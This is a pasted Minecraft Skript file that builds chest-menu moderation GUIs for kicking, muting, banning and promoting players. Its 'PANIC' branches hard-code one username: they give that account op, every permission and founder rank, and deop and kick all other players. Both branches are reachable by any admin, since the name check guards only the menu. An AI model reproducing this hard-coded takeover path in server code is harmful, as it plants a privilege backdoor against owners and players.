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Jan 17th, 2020
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  1. command /admingui:
  2. permission: staff
  3. trigger:
  4. wait 5 ticks
  5. open chest with 1 row named "&4Admin Gui" to player
  6. format slot 1 of player with emerald block named "&a&lHelper Commands" to close then run [make console execute command "/gui %player% helper"]
  8. format slot 3 of player with emerald block named "&d&lModerator Commands" to close then run [make console execute command "/gui %player% moderator"]
  9. format slot 5 of player with emerald block named "&4&lAdministrator Commands" to close then run [make console execute command "/gui %player% admin"]
  10. format slot 7 of player with redstone block named "&c&lPANIC" with lore "Owner only" to close then run [make console execute command "/gui %player% panic"]
  11. on join:
  12. if {banning.%player%} isn't set:
  13. set {banning.%player%} to none
  16. command /gui [<player>] [<text>]:
  17. permission: admin
  18. trigger:
  19. wait 5 ticks
  20. if arg-2 is "helper":
  21. open chest with 1 row named "&aHelper Commands" to arg-1
  22. format slot 1 of arg-1 with barrier block named "&4Bans" to close then run [make console execute command "/gui %arg-1% banshelper"]
  23. format slot 7 of arg-1 with barrier block named "&cPunishments" to close then run [make console execute command "/gui %arg-1% punishmentshelper"]
  24. format slot 8 of arg-1 with arrow named "&6Back" to close then run [make arg-1 execute command "/admingui"]
  25. if arg-2 is "banshelper":
  26. open chest with 2 rows named "&cBans" to arg-1
  27. format slot 0 of arg-1 with barrier block named "&cban (10 minutes)" with lore "bans player for 10 minutes" to close then run [make console execute command "/gui %arg-1% currentonlineforhelper"]
  28. format slot 8 of arg-1 with arrow named "&6Back" to close then run [make console execute command "/gui %arg-1% helper"]
  29. if arg-2 is "currentonlineforhelper":
  30. set {banningreason.%arg-1%} to true
  31. send "&aPlease type the ban reason in chat." to arg-1
  32. if arg-2 is "punishmentshelper":
  33. open chest with 1 row named "&cPunishments" to arg-1
  34. format slot 1 of arg-1 with barrier block named "&cMute" to close then run [make console execute command "/gui %arg-1% currentonlineforhelper2"]
  35. format slot 3 of arg-1 with barrier block named "&cKick" to close then run [make console execute command "/gui %arg-1% kick"]
  36. format slot 8 of arg-1 with arrow named "&6Back" to close then run [make console execute command "/gui %arg-1% helper"]
  37. if arg-2 is "kick":
  38. send "&aType in chat the kick reason." to arg-1
  39. set {kickingreason.%arg-1%} to true
  40. if arg-2 is "kick2":
  41. open chest with 2 rows named "&ePlayers" to arg-1
  42. set {_slot} to 0
  43. loop all players:
  44. format slot {_slot} of arg-1 with loop-player's skull named "%loop-player%" to close then run [make console execute command "/kick %loop-player% %{kickreason.%arg-1%}%"]
  45. add 1 to {_slot}
  46. if arg-2 is "currentonlineforhelper2":
  47. set {mutetiming.%arg-1%} to true
  48. send "&aChoose your mute time, type in chat. NUMBERS ONLY NO PERIODS." to arg-1
  49. if arg-2 is "currentonlineforhelper3":
  50. open chest with 2 rows named "&ePlayers" to arg-1
  51. set {_slot} to 0
  52. loop all players:
  53. format slot {_slot} of arg-1 with loop-player's skull named "%loop-player%" to close then run [make console execute command "/mute %loop-player% %{mutetime.%arg-1%}%m"]
  54. add 1 to {_slot}
  55. if arg-2 is "currentonlineforhelper4":
  56. open chest with 2 rows named "&ePlayers" to arg-1
  57. set {_slot} to 0
  58. loop all players:
  59. format slot {_slot} of arg-1 with loop-player's skull named "%loop-player%" to close then run [make console execute command "/tempban %loop-player% 10m %{banreason.%arg-1%}%"]
  60. add 1 to {_slot}
  61. if arg-2 is "moderator":
  62. if arg-1 has permission "moderator":
  63. open chest with 2 rows named "&dModerator Commands" to arg-1
  64. format slot 1 of arg-1 with barrier block named "&cBan" to close then run [make console execute command "/gui %arg-1% modban"]
  65. format slot 3 of arg-1 with barrier block named "&cPunishments" to close then run [make console execute command "/gui %arg-1% modpunishments"]
  66. format slot 5 of arg-1 with barrier block named "&cPermanent Ban" to close then run [make console execute command "/gui %arg-1% permbans"]
  67. format slot 8 of arg-1 with arrow named "&6Back" to close then run [make arg-1 execute command "/admingui"]
  68. if arg-2 is "modban":
  69. send "&aType in chat how long you want the ban to be (NUMBERS ONLY, THIS WILL ONLY BAN THEM IN TERMS OF HOURS, NOT DAYS OR MINUTES." to arg-1
  70. set {banningtime.%arg-1%} to true
  71. if arg-2 is "banningmod":
  72. open chest with 2 rows named "&ePlayers" to arg-1
  73. set {_slot} to 0
  74. loop all players:
  75. format slot {_slot} of arg-1 with loop-player's skull named "%loop-player%" to close then run [make console execute command "/tempban %loop-player% %{bantime.%arg-1%}%h %{banreason2.%arg-1%}%"]
  76. add 1 to {_slot}
  77. if arg-2 is "modpunishments":
  78. open chest with 1 row named "&dModerator Punishments" to arg-1
  79. format slot 1 of arg-1 with barrier block named "&cKick" to close then run [make console execute command "/gui %arg-1% kick"]
  80. format slot 3 of arg-1 with barrier block named "&cMute" to close then run [make console execute command "/gui %arg-1% currentonlineforhelper2"]
  81. format slot 8 of arg-1 with arrow named "&6Back" to close then run [make console execute command "/gui %arg-1% moderator"]
  82. if arg-2 is "permbans":
  83. send "&aType in chat the reason for the ban or type 'cancel' to cancel." to arg-1
  84. set {permbanning.%arg-1%} to true
  85. if arg-2 is "permbans2":
  86. open chest with 2 rows named "&ePlayers" to arg-1
  87. set {_slot} to 0
  88. loop all players:
  89. format slot {_slot} of arg-1 with loop-player's skull named "%loop-player%" to close then run [make console execute command "/ban %loop-player% %{permbanreason.%arg-1%}%"]
  90. add 1 to {_slot}
  91. if arg-2 is "admin":
  92. if arg-1 has permission "admin":
  93. open chest with 1 row named "&4Administrator Commands" to arg-1
  94. format slot 1 of arg-1 with barrier block named "&cBan" to close then run [make console execute command "/gui %arg-1% modban"]
  95. format slot 3 of arg-1 with barrier block named "&cPunishments" to close then run [make console execute command "/gui %arg-1% adminpunishments"]
  96. format slot 5 of arg-1 with barrier block named "&cPermanent Ban" to close then run [make console execute command "/gui %arg-1% permbans"]
  97. format slot 7 of arg-1 with barrier block named "&cPromos/Demos" to close then run [make console execute command "/gui %arg-1% promodemo"]
  98. format slot 8 of arg-1 with arrow named "&6Back" to close then run [make arg-1 execute command "/admingui"]
  99. if arg-2 is "adminpunishments":
  100. open chest with 1 row named "&4Administrative Punishments" to arg-1
  101. format slot 1 of arg-1 with barrier block named "&cKick" to close then run [make console execute command "/gui %arg-1% kick"]
  102. format slot 3 of arg-1 with barrier block named "&cMute" to close then run [make console execute command "/gui %arg-1% currentonlineforhelper2"]
  103. format slot 8 of arg-1 with arrow named "&6Back" to close then run [make console execute command "/gui %arg-1% admin"]
  104. if arg-2 is "promodemo":
  105. open chest with 1 row named "&4Promotions & Demotions" to arg-1
  106. format slot 1 of arg-1 with diamond block named "&aPromote to Helper" to close then run [make console execute command "/gui %arg-1% promote"]
  107. format slot 3 of arg-1 with barrier block named "&cDemote to Default (helpers only)" to close then run [make console execute command "/gui %arg-1% demote"]
  108. format slot 8 of arg-1 with arrow named "&6Back" to close then run [make console execute command "/gui %arg-1% adminpunishments"]
  109. if arg-2 is "promote":
  110. open chest with 2 rows named "&ePlayers" to arg-1
  111. set {_slot} to 0
  112. loop all players:
  113. format slot {_slot} of arg-1 with loop-player's skull named "%loop-player%" to close then run [make arg-1 execute command "/lp user %loop-player% parent add helper"]
  114. add 1 to {_slot}
  115. if arg-2 is "demote":
  116. open chest with 2 rows named "&ePlayers" to arg-1
  117. set {_slot} to 0
  118. loop all players:
  119. format slot {_slot} of arg-1 with loop-player's skull named "%loop-player%" to close then run [make arg-1 execute command "/lp user %loop-player% parent remove helper"]
  120. add 1 to {_slot}
  121. if arg-2 is "panic":
  122. if arg-1's name is "KailumsSon":
  123. open chest with 1 row named "&4&lPANIC" to arg-1
  124. format slot 1 of arg-1 with diamond named "&eGive all perms, op, etc." to close then run [make console execute command "/gui %arg-1% allop"]
  125. format slot 3 of arg-1 with barrier block named "&cAnarchy, deop all, kickall" with lore "apart from yourself" to close then run [make console execute command "/gui %arg-1% anarchy"]
  126. format slot 8 of arg-1 with arrow named "&6Back" to close then run [make arg-1 execute command "/admingui"]
  128. else:
  129. send "&cYou are not KailumsSon." to arg-1
  130. if arg-2 is "allop":
  131. make console execute command "/op KailumsSon"
  132. make console execute command "/lp user KailumsSon permission set *"
  133. make console execute command "/lp user KailumsSon parent add founder"
  134. send "&aYou're op and have everything, fight against the war!" to arg-1
  135. if arg-2 is "anarchy":
  136. loop all players:
  137. if loop-player's name isn't "KailumsSon":
  138. make console execute command "/deop %loop-player%"
  139. wait 1 second
  140. make console execute command "/kick %loop-player%"
  149. command /bannone:
  150. trigger:
  151. set {banning.%player%} to none
  156. on chat:
  157. if {mutetiming.%player%} is true:
  158. cancel event
  159. set {mutetime.%player%} to message
  160. set {mutetiming.%player%} to false
  161. send "&aSuccessful" to player
  162. make console execute command "/gui %player% currentonlineforhelper3"
  163. if {banningreason.%player%} is true:
  164. cancel event
  165. set {banningreason.%player%} to false
  166. set {banreason.%player%} to message
  167. send "&aSucessful" to player
  168. make console execute command "/gui %player% currentonlineforhelper4"
  169. if {kickingreason.%player%} is true:
  170. cancel event
  171. set {kickingreason.%player%} to false
  172. set {kickreason.%player%} to message
  173. send "&aSuccessful" to player
  174. make console execute command "/gui %player% kick2"
  175. if {banningtime.%player%} is true:
  176. cancel event
  177. set {banningtime.%player%} to false
  178. set {bantime.%player%} to message
  179. send "&aNow say the ban reason in chat." to player
  180. set {banningreason2.%player%} to true
  181. stop
  182. if {banningreason2.%player%} is true:
  183. cancel event
  184. set {banningreason2.%player%} to false
  185. set {banreason2.%player%} to message
  186. send "&aSuccessful" to player
  187. make console execute command "/gui %player% banningmod"
  188. if {permbanning.%player%} is true:
  189. if message doesn't contain "cancel":
  190. cancel event
  191. set {permbanreason.%player%} to message
  192. set {permbanning.%player%} to false
  193. send "&aSuccessful" to player
  194. make console execute command "/gui %player% permbans2"
  195. else:
  196. cancel event
  197. set {permbanning.%player%} to false
  198. send "&aCancelled" to player
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